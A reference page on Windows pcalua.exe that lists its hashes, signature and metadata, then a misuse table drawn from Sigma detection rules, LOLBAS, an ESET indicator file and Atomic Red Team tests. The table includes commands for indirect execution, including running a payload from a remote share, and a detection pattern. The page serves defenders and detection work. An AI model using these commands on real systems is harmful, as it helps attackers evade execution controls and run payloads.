pcalua.exe

  • File Path: C:\WINDOWS\system32\pcalua.exe
  • Description: Program Compatibility Assistant

Hashes

Type Hash
MD5 F8FD8FA4C87E6DCF063A17D24A2576CE
SHA1 125565A83E6407939E314A8ADECD96F4D4130FE9
SHA256 DE0D9DF989B49D5A38758196690236C732A8E86DEB9F9487337289E10899FDC0
SHA384 C7AD6D1B6A0D11AE14F963B90F4207175990D048E9BEF593549B6EB94F0C407E8F6CF26D4346E8435E61807FA639FB10
SHA512 BAC419C1A70F05F508C19D0F48803D9ED3DA7662D58DEF0A8C85E1FA4FAFC5DB97F0ED0F92BABCF0F08534B7C5CB91664CC9A2A006D7B0DE2C4B4A180636325D
SSDEEP 1536:ZAMMTMxtBoGcFBZUv9mFNgyQZe4RDNxjJvt:ZvM+tBgBKAFNgyEDNxf

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename:
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of pcalua.exe being misused. While pcalua.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_indirect_cmd.yml description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). DRL 1.0
sigma proc_creation_win_indirect_cmd.yml - '\pcalua.exe' DRL 1.0
LOLBAS Pcalua.yml Name: Pcalua.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a calc.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a \\server\payload.dll  
LOLBAS Pcalua.yml - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java  
LOLBAS Pcalua.yml - Path: C:\Windows\System32\pcalua.exe  
malware-ioc misp_invisimole.json "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", © ESET 2014-2018
atomic-red-team index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1202.md <blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1202.md - Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md ## Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{payload_path} MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.